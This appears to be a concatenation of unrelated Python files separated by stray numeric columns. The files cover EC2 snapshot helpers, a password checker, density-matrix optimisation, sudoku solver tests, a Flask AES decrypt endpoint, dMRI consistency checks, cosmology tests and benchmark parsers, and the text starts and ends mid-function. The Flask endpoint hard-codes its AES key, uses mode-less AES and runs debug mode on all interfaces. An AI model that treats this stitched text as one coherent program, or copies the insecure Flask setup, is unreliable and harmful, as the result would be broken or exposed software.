    Convert {"Name": "XXX"} to {"tag:Name": "XXX"}

    Names that already carry the 'tag:' prefix are left untouched,
    so the function is idempotent. (Python 2 only: uses dict.iteritems.)
    """
    new_tags = {}
    for name, value in tags.iteritems():
        if not name.startswith('tag:'):
            # ''.join trick prepends the 'tag:' prefix.
            name = 'tag:'.join(["", name])
        new_tags[name] = value
    return new_tags
def find_snapshot_by_tags(self, tags):
    """
    Find a snapshot by specific tags

    :type tags: dict
    :param tags: snapshot tags like {'Name': 'XXX'}

    :rtype: list
    :return: list of boto snapshot objects
        NOTE(review): when tag:Timestamp == 'latest' this actually returns
        a single snapshot object (or None), not a list -- callers such as
        clean_snapshots iterate the result, so confirm the intended contract.
    """
    tags = self.format_tags(tags)
    # FIXME: only used for Cassandra
    if 'tag:Timestamp' in tags and tags['tag:Timestamp'] == '0':
        # Timestamp '0' sentinel: restrict the filter to Role + Timestamp only.
        refined_tags = {}
        refined_tags['tag:Role'] = tags['tag:Role']
        refined_tags['tag:Timestamp'] = tags['tag:Timestamp']
        tags = refined_tags
    if 'tag:Timestamp' in tags and \
            tags['tag:Timestamp'].lower() == 'latest':
        # 'latest': drop the timestamp filter and pick the newest match.
        tags.pop('tag:Timestamp')
        snapshots = self.get_all_snapshots(filters=self.format_tags(tags))
        if snapshots:
            return self.fetch_latest_snapshot(snapshots)
        else:
            return None
    # Double formatting is harmless: format_tags is idempotent.
    return self.get_all_snapshots(filters=self.format_tags(tags))
def fetch_latest_snapshot(self, snapshots):
    """
    Find the latest Snapshot

    Timestamps are 'YYYYmmdd-HHMM' strings, so lexicographic order is
    chronological order; ties resolve to the first occurrence.
    """
    return max(snapshots, key=lambda snapshot: snapshot.tags['Timestamp'])
def fetch_snapid_by_tags(self, **tags):
    """
    Find the Snapshot Id by specific tags

    :type tags: dict
    :param tags: snapshot tags like {'Name': 'XXX'}

    :rtype: string
    :return: Snapshot Id, or None when there is no match or the match
        is ambiguous (multiple snapshots without Timestamp == 'latest')
    """
    # FIXME: if tag:Timestamp == latest, then flag = True
    flag = False
    tags = self.format_tags(tags)
    # FIXME: hard-coded string in tags
    if 'tag:Timestamp' in tags and \
            tags['tag:Timestamp'].lower() == 'latest':
        # 'latest' requested: drop the filter and remember to disambiguate
        # multiple matches by picking the newest one.
        del tags['tag:Timestamp']
        flag = True
    snapshots = self.find_snapshot_by_tags(tags)
    if not snapshots:
        return None
    elif len(snapshots) > 1:
        # FIXME: hard-coded string in tags
        if not flag:
            # Ambiguous without 'latest' -- refuse to guess.
            return None
        snapshot = self.fetch_latest_snapshot(snapshots)
        if not snapshot:
            return None
        else:
            return snapshot.id
    else:
        return snapshots[0].id
def clean_snapshots(self, tags, duration):
    """
    Clean up snapshots by specific tags and duration
    (Python 2 only: uses the `except Exception, e` syntax below.)

    :type tags: dict
    :param tags: snapshot tags like

     .. code-block:: javascript

        {
          "Name": "XXX"
        }

    :type duration: int
    :param duration: seconds; snapshots whose Timestamp tag is older than
        this many seconds (relative to current UTC time) are deleted

    :rtype: list
    :return: list of cleaned snapshot ids
    """
    snapshots = self.find_snapshot_by_tags(self.format_tags(tags))
    deleted_ids = []
    for snapshot in snapshots:
        # Only snapshots stamped by take_snapshot carry a Timestamp tag.
        if 'Timestamp' in snapshot.tags:
            try:
                tmp_time = strptime(snapshot.tags[
                    'Timestamp'], "%Y%m%d-%H%M")
                timestamp = mktime(tmp_time)
            except Exception, e:
                # Unparseable timestamp: log and keep the snapshot.
                log.error(e)
                continue
            now = mktime(gmtime())
            if now - timestamp > duration:
                deleted_ids.append(snapshot.id)
                self.del_snapshot(snapshot.id)
    return deleted_ids
def del_snapshot(self, snapshot_id):
    """
    Delete snapshots by snapshot_id

    :type snapshot_id: string
    :param snapshot_id: snapshot Id like 'snap-xxxxxx'

    :rtype: boolean
    :return: true, false, exception
    """
    # Delegates to the boto connection's delete_snapshot.
    return self.delete_snapshot(snapshot_id)
def find_ami_by_tags(self, tags):
    """
    Find AMI by specific tags

    :type tags: dict
    :param tags: AMI tags like {'Name': 'XXX'}

    :rtype: list
    :return: list of boto image objects
    """
    # format_tags is idempotent, so pre-formatted tags pass through unchanged.
    return self.get_all_images(filters=self.format_tags(tags))
def fetch_imageid_by_tags(self, **tags):
    """
    Fetch the Image Id by specific tags

    :type tags: dict
    :param tags: AMI tags like {'Name': 'XXX'}

    :rtype: string
    :return: Image Id, or None when there is no match or more than one
    """
    images = self.find_ami_by_tags(self.format_tags(tags))
    # Only an unambiguous single match yields an id.
    if images and len(images) == 1:
        return images[0].id
    return None
def get_all_zones(self, zones=None):
    """
    Get all Availability Zones under this region

    :type zones: list
    :param zones: specified zone list; when given, it is returned as-is
        without querying EC2

    :rtype: list
    :return: list of availability zone names in this region
    """
    if zones is not None and isinstance(zones, list):
        return zones
    else:
        # Query EC2 via the parent class and reduce the zone objects to names.
        return [zone.name for zone in super(IcsEc2, self).get_all_zones()]
def size_of_all_zones(self, zones=None):
    """
    Get the number of all Availability Zones under this region

    :type zones: list
    :param zones: specified zone list

    :rtype: int
    :return: number of availability zones in this region
    """
    # An empty/None zone list counts as zero.
    zone_list = self.get_all_zones(zones)
    return len(zone_list) if zone_list else 0
def get_sgroup(self, name, vpc_id=None):
    """
    Get Security Group Name (if Ec2) / Id (if Vpc)

    :param name: security group name
    :type name: string

    :param vpc_id: vpc id
    :type vpc_id: string

    :rtype: string
    :return: the group name itself for EC2-Classic (no vpc_id),
        the group id for VPC, or None when no VPC group matches
    """
    if vpc_id is None:
        # EC2-Classic accepts the plain name.
        return name
    else:
        filters = {'vpc-id': vpc_id, 'group-name': name}
        group = self.get_all_security_groups(filters=filters)
        if group and isinstance(group, list):
            return group[0].id
        else:
            return None
def get_security_group_id(self, name, vpc_id=None):
    """
    Get security group id

    :param name: security group name
    :type name: string

    :param vpc_id: vpc id
    :type vpc_id: string

    :rtype: string
    :return: security group id, or None when no group matches
    """
    # Always match on name; narrow to the VPC only when one was given.
    filters = {'group-name': name}
    if vpc_id:
        filters['vpc-id'] = vpc_id
    group = self.get_all_security_groups(filters=filters)
    return group[0].id if group else None
def get_az_from_subnet_id(self, subnet_id=None, zones=None):
    """
    Get the name of Availability Zone by its Subnet Id
    (Python 2 only: relies on `basestring`.)

    :type zones: list
    :param zones: specified zone list

    :type subnet_id: string or comma-seperated list of string
    :param subnet_id: subnet id

    :rtype: list
    :return: a list of availability zone names; all zones when subnet_id
        is None; None when subnet_id is not a string
    """
    if subnet_id is None:
        return self.get_all_zones(zones)
    # Subnets live in the VPC API, so open a VPC connection in this region.
    vpc = vpc_connect_to_region(self.region.name)
    if isinstance(subnet_id, basestring):
        # Accept "subnet-a,subnet-b" with optional surrounding whitespace.
        subnet_ids = subnet_id.lstrip().rstrip().split(",")
    else:
        return None
    zones = []
    for sid in subnet_ids:
        subnets = vpc.get_all_subnets(sid)
        if subnets and isinstance(subnets, list):
            zones.append(subnets[0].availability_zone)
    return zones
def get_zone_name_for_cassandra(self, index, zones=None):
    """
    Get the name of Availability Zone for Cassandra

    :type zones: list
    :param zones: specified zone list

    :type index: int
    :param index: the index of cassandra instance (1-based)

    :rtype: string
    :return: zone name like "us-west-2a"
    """
    # Instances are distributed round-robin across the zones; index is
    # 1-based, hence the -1 before the modulo.
    available = self.get_all_zones(zones)
    position = (int(index) - 1) % self.size_of_all_zones(zones)
    return available[position]
def get_zone_index_for_cassandra(self, index, zones=None):
    """
    Get the index of Availability Zone for Cassandra

    :type zones: list
    :param zones: specified zone list

    :type index: int
    :param index: the index of cassandra instance (1-based)

    :rtype: string
    :return: zone index like "1"
    """
    zone_size = self.size_of_all_zones(zones)
    # NOTE(review): relies on Python 2 integer division (floor); under
    # Python 3 `/` would yield a float and change the result.
    return str((int(index) - 1) / zone_size + 1)
def get_zone_suffix_for_cassandra(self, index, zones=None):
    """
    Get the suffix of Availability Zone for Cassandra

    :type zones: list
    :param zones: specified zone list

    :type index: int
    :param index: the index of cassandra instance

    :rtype: string
    :return: zone suffix like "a-1"
    """
    # Combine the zone letter (last char of e.g. "us-west-2a") with the
    # per-zone ring index.
    zone_letter = self.get_zone_name_for_cassandra(index, zones)[-1]
    ring_index = self.get_zone_index_for_cassandra(index, zones)
    return "%s-%s" % (zone_letter, ring_index)
# vim: tabstop=4 shiftwidth=4 softtabstop=4
| 23,795 | 6,782 |
# Pair Programming
# Accept a password only when it contains the passphrase and none of the
# banned substrings below.
passphrase = "megmo"  # bug fix: `"Megmo" and "megmo"` always evaluated to "megmo"
null1 = "123"
null2 = "letmein"
null3 = "password"
while True:
    password = input("Please enter password: ")
    # Bug fix: the original success check used `not null1` (etc.), which is
    # always False for a non-empty string, so the loop could never terminate.
    # Track whether any banned substring was seen instead.
    clean = True
    if null3 in password:
        print("Incorrect | Password has password inside")
        clean = False
    if null2 in password:
        print("Incorrect | password has letmein")
        clean = False
    if null1 in password:
        print("Incorrect | Password has 123")
        clean = False
    if passphrase in password and clean:
        print("Correct | Password validated")
        break
| 540 | 171 |
from sqlalchemy import create_engine
from pywky.db.models import Base
# Create the SQLite engine for the dev database and bind the declarative
# metadata to it so tables can be created/reflected against this engine.
engine = create_engine('sqlite:///worky_dev.db')
Base.metadata.bind = engine
| 149 | 49 |
# -*- coding:utf-8 -*-
from __future__ import division
import numpy as np
import os
import math
import pickle as Pickle
import pynlpir
import random
from math import log
from numpy import linalg as LA
def F(rhoM, proDict):
    """Log-likelihood objective: sum over measurements of w * log(tr(P @ rho)).

    proDict maps a label to [weight, projector]; rhoM is the density matrix.
    """
    return sum(
        weight * log(np.trace(np.dot(projector, rhoM)))
        for weight, projector in proDict.values()
    )
def Grad_F(rhoM, proDict, dim):
    """Gradient of F at rhoM: sum over measurements of w * P / tr(P @ rho)."""
    gradient = np.zeros((dim, dim))
    for weight, projector in proDict.values():
        gradient += weight * projector / np.trace(np.dot(projector, rhoM))
    return gradient
def rho_bar(rhoM, proDict, dim):
    """Symmetrized update (G @ rho + rho @ G) / 2, with G = Grad_F(rho)."""
    gradient = Grad_F(rhoM, proDict, dim)
    return (np.dot(gradient, rhoM) + np.dot(rhoM, gradient)) / 2
def rho_tilde(rhoM, proDict, dim):
    """Trace-normalized conjugated update G @ rho @ G / tr(G @ rho @ G)."""
    gradient = Grad_F(rhoM, proDict, dim)
    conjugated = np.dot(np.dot(gradient, rhoM), gradient)
    return conjugated / np.trace(conjugated)
def D_bar(rhoM, proDict, dim):
    """Search direction toward the symmetrized update: rho_bar - rho."""
    return rho_bar(rhoM, proDict, dim) - rhoM
def D_tilde(rhoM, proDict, dim):
    """Search direction toward the normalized conjugated update: rho_tilde - rho."""
    return rho_tilde(rhoM, proDict, dim) - rhoM
def q_t(t, rhoM, proDict, dim):
    """Normalization factor q(t) = 1 + 2t + t^2 * tr(G @ rho @ G)."""
    gradient = Grad_F(rhoM, proDict, dim)
    trace_term = np.trace(np.dot(np.dot(gradient, rhoM), gradient))
    return 1 + 2 * t + t * t * trace_term
def D(t, rhoM, proDict, dim):  # Equation (19)
    """Combined search direction: (2/q) * D_bar + (t * tr(G rho G) / q) * D_tilde,
    where q = q_t(t) normalizes the mixture of the two directions."""
    grad_f = Grad_F(rhoM, proDict, dim)
    grad_rho_grad = np.dot(np.dot(grad_f, rhoM),grad_f)
    d_bar = D_bar(rhoM, proDict, dim)
    d_tilde = D_tilde(rhoM, proDict,dim)
    q = q_t(t, rhoM, proDict, dim)
    res = (2/q)*d_bar + (t*np.trace(grad_rho_grad)/q)*d_tilde
    return res
def set_t(t):
    """Clamp the step size from below at 1."""
    return t if t > 1 else 1
def judgement(rhoM, proDict, f_old, dim, threshold_values=(1e-7, 1e-7, 1e-7)):
    """Return True while the iteration should continue (not yet converged).

    Convergence requires all three gaps to fall below their thresholds:
    ||rho - G rho G||, ||rho - G rho||, and |f_old - F(rho)|.
    """
    gradient = Grad_F(rhoM, proDict, dim)
    fixed_point_gap = LA.norm(rhoM - np.dot(np.dot(gradient, rhoM), gradient))
    stationarity_gap = LA.norm(rhoM - np.dot(gradient, rhoM))
    objective_gap = abs(f_old - F(rhoM, proDict))
    converged = (
        fixed_point_gap < threshold_values[0]
        and stationarity_gap < threshold_values[1]
        and objective_gap < threshold_values[2]
    )
    return not converged
def judge_t(t, d, rhoM, proDict, dim, iter_r):
    """Line-search acceptance test for step *t* along direction *d*.

    Accepts when F(rho + t*d) <= F(rho) + iter_r * t * tr(Grad_F . d)
    (Armijo-style sufficient-change bound -- NOTE(review): the <= direction
    assumes the caller's sign convention for maximizing F; confirm).
    Returns False when the objective did not move at all.
    """
    # print 'please see here:'
    f_new = F(rhoM + t * d, proDict)
    f_old = F(rhoM, proDict)
    diff = iter_r * t * np.trace(np.dot(Grad_F(rhoM, proDict,dim), d))
    if(f_new == f_old):
        return False
    # print(f_new-f_old)
    return(f_new <=f_old+diff)
def test_set_generator(proj_num,vector_dim):
dictionary = {}
for i in range(proj_num):
weight = np.random.random()
vector = np.random.rand(1,vector_dim)
vector = vector/(math.sqrt(np.dot(vector,np.transpose(vector))))
projector = np.outer(vector, vector) / np.inner(vector, vector)
dictionary['word_'+str(i)] = [weight, projector]
return dictionary | 2,680 | 1,221 |
#! /usr/bin/env python
from foodify import app
# Start the Flask development server; debug mode enables the reloader
# and in-browser tracebacks (development only).
app.run(debug = True)
"""This python script can be used to test the correctness and finiteness of the algorithms."""
from multiprocessing import Process
from BASolver2 import bASolve, bASolverHandle
from OPBASolver import OPSolverHandle
import time
# bASolve()
class NonFiniteException(Exception):
    # Raised when a solver run exceeds the 10-second budget enforced by
    # the test drivers below (see testBA / testOP).
    pass
def testcorrectness(algo):
""""Test the algorithm specified in <algo>
algo:
1: BA-Algorithm
2: OPBA-Algorithm
3: Algorithm X
The input will be passed to the algorithm directly
"""
if algo == 1:
return testBA()
elif algo == 2:
return testOPBA()
elif algo == 3:
return testAlgoX()
def locBASOLVE(grid):
    # Subprocess worker: solve *grid* with the BA solver and print the result
    # (output is the only channel back from the child process).
    print(bASolverHandle(grid))
    # print(grid)
def testBA():
    """Run the BA solver on valid and invalid grids in subprocesses,
    raising NonFiniteException for any run that exceeds 10 seconds."""
    inputs = []
    # A solvable standard 9x9 puzzle.
    validInput = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 0, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
    inputs.append(validInput)
    wrongdim = [[1,2,3,4],[4,3,2,1],[2,1,4,3],[3,4,1,2]] # 4x4 instead of 9x9
    inputs.append(wrongdim)
    # 8 is two times in a column at start, therefore unsolvable.
    invStart = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 8, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
    inputs.append(invStart)
    # 22 is not valid.
    invNumbers = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 22, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
    inputs.append(invNumbers)
    # Fully empty grid.
    emptyinp = [[0 for _ in range(9)] for _ in range(9)]
    inputs.append(emptyinp)
    for inp in inputs:
        # Run each case in its own process so a hung solver can be killed.
        proc = Process(target=locBASOLVE, args=[inp])
        proc.start()
        curtim = time.time()
        proc.join(timeout=11) # This stops the test if it takes longer than 10 seconds
        if abs(curtim-time.time()) >10:
            print("ERROR, took longer than 10 seconds. Stoped after 10 seconds")
            raise NonFiniteException("The solver took more than 10 seconds.")
        proc.terminate()
        print("NEXT")
def testOP():
    """Run the OP solver on the same valid/invalid grid suite as testBA,
    raising NonFiniteException for any run that exceeds 10 seconds."""
    inputs = []
    # A solvable standard 9x9 puzzle.
    validInput = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 0, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
    inputs.append(validInput)
    wrongdim = [[1,2,3,4],[4,3,2,1],[2,1,4,3],[3,4,1,2]] # 4x4 instead of 9x9
    inputs.append(wrongdim)
    # 8 is two times in a column at start, therefore unsolvable.
    invStart = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 8, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
    inputs.append(invStart)
    # 22 is not valid.
    invNumbers = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 22, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
    inputs.append(invNumbers)
    # Empty field:
    emptyinp = [[0 for _ in range(9)] for _ in range(9)]
    inputs.append(emptyinp)
    for inp in inputs:
        # Run each case in its own process so a hung solver can be killed.
        proc = Process(target=OPSolverHandle, args=[inp])
        proc.start()
        curtim = time.time()
        proc.join(timeout=11) # This stops the test if it takes longer than 10 seconds
        if abs(curtim-time.time()) >10:
            print("ERROR, took longer than 10 seconds. Stoped after 10 seconds")
            raise NonFiniteException("The solver took more than 10 seconds.")
        proc.terminate()
        print("NEXT")
def testOPBA():
    # TODO: OPBA test suite not implemented yet (referenced by testcorrectness).
    pass
def testAlgoX():
    # TODO: Algorithm X test suite not implemented yet (referenced by testcorrectness).
    pass
if __name__ == "__main__":
testBA()
testOP()
testAlgoX()
# print(bASolverHandle([[0 for _ in range(9)] for _ in range(9)]))
| 4,400 | 2,437 |
from crypt import methods
from this import s
from flask import Flask, request, jsonify
import base64
import os
from Crypto.Cipher import AES
from urllib.parse import unquote
# Flask application exposing a single /decrypt endpoint.
app = Flask(__name__)
# AES key shared with the encrypting side -- NOTE(review): hard-coded secret;
# move to configuration/environment for anything beyond local testing.
secret = 'TESTTESTTESTTEST'
# Padding character stripped from decrypted payloads (see unpad_str/decode_str).
p_char = '%'
def unpad_str(msg):
    """Decode UTF-8 bytes and strip the trailing '%' padding characters."""
    return msg.decode('utf-8').rstrip('%')
def decrypt_message(msg, key):
    """Base64-decode *msg*, AES-decrypt it with *key*, and strip padding.

    Raises a generic Exception('Error Decrypting') on any cipher failure.
    """
    decoded_encrypted_msg = base64.b64decode(msg)
    # NOTE(review): AES.new(key) with no mode/IV relies on the legacy PyCrypto
    # default (ECB); PyCryptodome requires an explicit mode argument -- confirm
    # which library this deploys against.
    cipher = AES.new(key)
    try:
        decrypted_msg = cipher.decrypt(decoded_encrypted_msg)
    except:
        raise Exception('Error Decrypting')
    else:
        unpadded_private_msg = unpad_str(decrypted_msg)
        return unpadded_private_msg
def decode_str(msg):
    """Parse the decrypted colon-delimited record into a response dict.

    Layout: id:name:email:emp_no:bev1;bev2;...:food_preference, with
    trailing '%' padding removed first. An emp_no of '0.0' maps to 'N/A'.
    """
    fields = msg.rstrip(p_char).split(':')
    return {
        'id': int(float(fields[0])),
        'name': fields[1],
        'email': fields[2],
        'emp_no': 'N/A' if fields[3] == '0.0' else fields[3],
        'beverages': fields[4].split(';'),
        'food_preference': fields[5],
    }
@app.route("/decrypt", methods=['GET'])
def decrypt():
args = request.args
encrypted_string = args.get('enc_str')
dec_str = ''
try:
dec_str = decrypt_message(encrypted_string, secret)
except:
return jsonify({'error': 'Invalid User!!'}), 400, {'ContentType': 'application/json'}
else:
processed_res = decode_str(dec_str)
return jsonify({'data': processed_res}), 200, {'ContentType': 'application/json'}
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True)
| 1,647 | 604 |
def greet(name):
    """Print a good-morning greeting for *name*."""
    print(f'Good morning, {name}')
# print (__name__)
if __name__ == '__main__':
    # Prompt for a name and greet interactively.
    n = input('Enter Your name: ')
    greet(n)
| 155 | 64 |
print("wewcome to the tip cawcuwatow. >_<")
bill = float(input("What is the total bill?\n$"))
tip_percentage = float(input("What percentage tip will you like to give?\n"))
split_among = int(input("How many people to split the bill?\n"))
total_bill_with_tip = bill + (bill * tip_percentage / 100)
each_pay = round(total_bill_with_tip / split_among, 2)
print(f"Each person should pay: ${each_pay:.2f}")
| 404 | 154 |
#!/usr/bin/env python
# ===============================================================================
# dMRIharmonization (2018) pipeline is written by-
#
# TASHRIF BILLAH
# Brigham and Women's Hospital/Harvard Medical School
# tbillah@bwh.harvard.edu, tashrifbillah@gmail.com
#
# ===============================================================================
# See details at https://github.com/pnlbwh/dMRIharmonization
# Submit issues at https://github.com/pnlbwh/dMRIharmonization/issues
# View LICENSE at https://github.com/pnlbwh/dMRIharmonization/blob/master/LICENSE
# ===============================================================================
from conversion import read_bvals, read_imgs, read_imgs_masks
import numpy as np
from warnings import warn
from plumbum import local
from util import abspath, load, isfile, getpid
from findBshells import findBShells
import sys
def check_bshells(ref_imgs, ref_bvals):
    """Verify every image in *ref_imgs* has the same b-shells as *ref_bvals*.

    Prints a per-case report. Raises FileNotFoundError for a missing image
    and ValueError listing all unmatched cases, so multi-shell
    harmonization is never run on inconsistent data.
    """
    unmatched = []
    for imgPath in ref_imgs:
        imgPath = local.path(imgPath)
        if not imgPath.exists():
            # Bug fix: the exception was constructed but never raised,
            # so missing files were silently ignored.
            raise FileNotFoundError(imgPath)

        inPrefix = abspath(imgPath).split('.nii')[0]
        bvals = findBShells(inPrefix + '.bval')

        if (bvals == ref_bvals).all():
            print('b-shells matched for', imgPath.name)
        else:
            print(f'\nUnmatched b-shells for {imgPath.name}')
            print(bvals)
            print(f'ref_bvals {ref_bvals}\n')
            unmatched.append(imgPath._path)

    print('')
    if len(unmatched):
        print('Unmatched cases:')
        print(unmatched)
        raise ValueError('Leave out the unmatched cases or change the reference case for determining b-shell to run multi-shell-dMRIharmonization')
    else:
        print('All cases have same b-shells. Data is good for running multi-shell-dMRIharmonization')
    print('')
def check_resolution(ref_imgs, ref_res):
    """Verify every image in *ref_imgs* has spatial resolution *ref_res*.

    Prints a per-case report. Raises FileNotFoundError for a missing image
    and ValueError listing all unmatched cases.
    """
    unmatched = []
    for imgPath in ref_imgs:
        imgPath = local.path(imgPath)
        if not imgPath.exists():
            # Bug fix: the exception was constructed but never raised,
            # so missing files were silently ignored.
            raise FileNotFoundError(imgPath)

        res = load(imgPath._path).header['pixdim'][1:4]
        # Bug fix: compare the magnitude of the per-axis differences; the
        # raw signed sum let opposite-signed differences cancel out and
        # pass genuinely mismatched resolutions.
        if np.abs(res - ref_res).sum() <= 10e-6:
            print('spatial resolution matched for', imgPath.name)
        else:
            print(f'\nUnmatched spatial resolution for {imgPath.name}')
            print(res)
            print(f'ref_res {ref_res}\n')
            unmatched.append(imgPath._path)

    print('')
    if len(unmatched):
        print('Unmatched cases:')
        print(unmatched)
        raise ValueError('Leave out the unmatched cases or change the reference case for determining spatial resolution to run multi-shell-dMRIharmonization')
    else:
        print('All cases have same spatial resolution. Data is good for running multi-shell-dMRIharmonization')
    print('')
def consistencyCheck(ref_csv, outputBshellFile= None, outPutResolutionFile= None):
    """Check b-shell and spatial-resolution consistency across a site's cases.

    Reads the case list from *ref_csv* (dwi,mask rows or dwi-only rows).
    Reference b-shells/resolution are loaded from the two output files when
    they already exist; otherwise they are derived from the first case and
    cached into those files.
    """
    try:
        ref_imgs, _ = read_imgs_masks(ref_csv)
    except:
        # Fall back to the single-column (dwi only) format.
        ref_imgs = read_imgs(ref_csv)

    if isfile(outputBshellFile) and isfile(outPutResolutionFile):
        ref_bvals= read_bvals(outputBshellFile)
        ref_res = np.load(outPutResolutionFile)
    else:
        # First run: derive the references from the first case and cache them.
        ref_bshell_img = ref_imgs[0]
        print(f'Using {ref_bshell_img} to determine b-shells')

        inPrefix = abspath(ref_bshell_img).split('.nii')[0]
        ref_bvals = findBShells(inPrefix + '.bval', outputBshellFile)

        ref_res = load(ref_bshell_img).header['pixdim'][1:4]
        np.save(outPutResolutionFile, ref_res)

    print('b-shells are', ref_bvals)
    print('\nSite', ref_csv, '\n')
    print('Checking consistency of b-shells among subjects')
    check_bshells(ref_imgs, ref_bvals)

    print('spatial resolution is', ref_res)
    print('Checking consistency of spatial resolution among subjects')
    check_resolution(ref_imgs, ref_res)
if __name__ == '__main__':
    # CLI entry point: print usage when called bare or with -h/--help.
    if len(sys.argv)==1 or sys.argv[1]=='-h' or sys.argv[1]=='--help':
        print('''Check consistency of b-shells and spatial resolution among subjects
Usage:
consistencyCheck list.csv/txt ref_bshell_bvalues.txt ref_res_file.npy
Provide a csv/txt file with first column for dwi and 2nd column for mask: dwi1,mask1\\ndwi2,mask2\\n...
or just one column for dwi1\\ndwi2\\n...
In addition, provide ref_bshell_bvalues and ref_res_file.''')
        exit()

    ref_csv= abspath(sys.argv[1])
    outputBshellFile= abspath(sys.argv[2])
    outPutResolutionFile= abspath(sys.argv[3])
    if isfile(ref_csv):
        consistencyCheck(ref_csv, outputBshellFile, outPutResolutionFile)
    else:
        raise FileNotFoundError(f'{ref_csv} does not exists.')
| 4,619 | 1,540 |
import numpy as np
from halomod.cross_correlations import ConstantCorr, CrossCorrelations
def test_cross_same():
    """Test if using two components that are the same gives the same as an auto corr."""
    # Two identically-configured halo models; the cross-correlation between
    # them should reproduce each one's auto-correlation.
    cross = CrossCorrelations(
        cross_hod_model=ConstantCorr,
        halo_model_1_params={
            "exclusion_model": "NoExclusion",
            "sd_bias_model": None,
            "transfer_model": "EH",
            "force_1halo_turnover": False,
        },
        halo_model_2_params={
            "exclusion_model": "NoExclusion",
            "sd_bias_model": None,
            "transfer_model": "EH",
            "force_1halo_turnover": False,
        },
    )
    # 2-halo terms should agree exactly.
    assert np.allclose(cross.power_2h_cross, cross.halo_model_1.power_2h_auto_tracer)
    assert np.allclose(cross.corr_2h_cross, cross.halo_model_1.corr_2h_auto_tracer)

    # This is only close-ish, because cross-pairs are actually different than auto-pairs,
    # since you can count self-correlations.
    assert np.allclose(
        cross.corr_1h_cross,
        cross.halo_model_1.corr_1h_auto_tracer,
        atol=1e-5,
        rtol=1e-1,
    )
    assert np.allclose(
        cross.power_1h_cross,
        cross.halo_model_1.power_1h_auto_tracer,
        atol=1e-6,
        rtol=1e-1,
    )
| 1,283 | 456 |
import argparse
import matplotlib
import scipy.stats
matplotlib.use("Agg")
import sys
import matplotlib.pyplot as plt
import numpy as np
import os
# Make the shared plotting helpers importable, then apply the LaTeX-style
# figure defaults before any axes are created.
sys.path.insert(0, '/root/jcw78/process_pcap_traces/')
import graph_utils
graph_utils.latexify(space_below_graph=0.4)
def tensorflow(folder, name_map):
    # Parse the TensorFlow MNIST benchmark output and return [steps/second].
    # (Python 2 module: print statements below.)
    # In tensorflow, the performance data is in all the slaves.
    # It is identical in every one, so just take an arb one.
    machine = name_map['slave'][0]
    data_file = folder + os.path.sep + machine + os.path.sep + \
        'data' + os.path.sep + 'tensorflow-mnist'
    with open(data_file, 'r') as f:
        for line in f.readlines():
            if line.startswith("Training elapsed time"):
                # The benchmark runs for 20000 steps, so get the
                # time per step.
                performance = 20000.0 / float(line.split(' ')[3])
                return [performance]
    # NOTE(review): falls through returning None, which will break callers
    # that do `performance += get_performance(...)`.
    print "Error: no performance numbers found!"
def apache(folder, name_map):
    # Parse apache-bench output from every client machine and return the
    # list of requests-per-second figures.
    # All the slaves have performance numbers here.
    performance_numbers = []
    for machine in name_map['client']:
        data_file = folder + os.path.sep + machine + os.path.sep + \
            'data' + os.path.sep + 'apache_ab_out'
        with open(data_file, 'r') as f:
            for line in f.readlines():
                if line.startswith('Requests per second:'):
                    # Filter out empty tokens from the multi-space alignment.
                    rate = float([x for x in line.split(' ') if x][3])
                    performance_numbers.append(rate)
    return performance_numbers
def memcached(folder, name_map):
    # Parse mutilate output from every client machine and return the list
    # of total queries-per-second figures.
    # All the slaves have different performance numbers here.
    performance = []
    for machine in name_map['client']:
        data_file = folder + os.path.sep + machine + os.path.sep + \
            'data' + os.path.sep + 'memcached_mutilate_stdout'
        with open(data_file, 'r') as f:
            for line in f.readlines():
                if line.startswith('Total QPS'):
                    rate = float(line.split(' ')[3])
                    performance.append(rate)
    return performance
def dns(folder, name_map):
